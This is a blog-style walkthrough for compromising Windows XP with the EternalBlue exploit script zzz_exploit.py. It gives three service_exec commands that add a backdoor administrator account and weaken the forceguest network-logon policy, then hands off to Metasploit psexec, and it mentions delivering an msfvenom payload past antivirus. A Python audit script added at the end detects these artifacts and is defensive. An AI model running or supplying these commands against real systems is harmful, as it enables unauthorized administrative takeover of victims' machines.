EternalBlue on Windows XP

There are a few articles and exploits out there where EternalBlue has been found to work on Windows XP. However, the Metasploit Framework does not seem to have a reliable exploit for it.

I did find a working exploit here; specifically, zzz_exploit.py works perfectly. However, it basically just writes an empty file (around line 975). You can use this to run arbitrary commands, though. So create an exploit with msfvenom, spin up a web server, have it downloaded, hope AV doesn't catch it... or, let's just take the easy road.

service_exec(conn, r'cmd /c net user <username> <password> /add')
service_exec(conn, r'cmd /c net localgroup Administrators <username> /add')
service_exec(conn, r'reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f')

These three lines create a user, add the user to the Administrators group, and then (perhaps most importantly) set the registry value behind secpol.msc -> Local Policies -> Security Options -> "Network access: Sharing and security model for local accounts". The value is set to 0, which corresponds to "Classic - local users authenticate as themselves".

Once the user is added and the value set, use exploit/windows/smb/psexec and authenticate!
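For defenders, the changes described above leave two artifacts that are easy to audit: a forceguest value of 0 and an extra member in the local Administrators group. The following is an added example, not part of the original post or of zzz_exploit.py. It parses output of `reg query` and `net localgroup Administrators` and compares it with a baseline; the sample output, the account name helpdesk2 and the baseline list are constructed, and it assumes a standalone XP host is expected to keep forceguest=1.

```python
import re

# Constructed sample: reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    forceguest  REG_DWORD   0x0
"""

# Constructed sample: net localgroup Administrators (account name is made up)
SAMPLE_GROUP = """Alias name     Administrators

Members

-------------------------------------------------------------------------------
Administrator
helpdesk2
The command completed successfully.
"""

def parse_forceguest(reg_output):
    """Return the forceguest DWORD as an int, or None if the value is absent."""
    m = re.search(r"^\s*forceguest\s+REG_DWORD\s+(0x[0-9a-f]+)", reg_output, re.I | re.M)
    return int(m.group(1), 16) if m else None

def parse_group_members(net_output):
    """Return the names listed between the dashed rule and the status line."""
    members, in_list = [], False
    for line in net_output.splitlines():
        line = line.strip()
        if line and set(line) == {"-"}:
            in_list = True
        elif in_list and line.lower().startswith("the command completed"):
            break
        elif in_list and line:
            members.append(line)
    return members

def audit(reg_output, net_output, expected_admins, domain_joined=False):
    """Compare host state with a baseline and return a list of findings."""
    findings = []
    # Assumption: a standalone XP host is expected to keep forceguest=1 (Guest only).
    if not domain_joined and parse_forceguest(reg_output) == 0:
        findings.append("forceguest=0 on standalone host")
    allowed = {name.lower() for name in expected_admins}
    for name in parse_group_members(net_output):
        if name.lower() not in allowed:
            findings.append("unexpected local administrator: " + name)
    return findings

print(audit(SAMPLE_REG, SAMPLE_GROUP, ["Administrator"]))
```

Both findings together on a host that still exposes SMB are worth treating as a likely compromise, not as configuration drift.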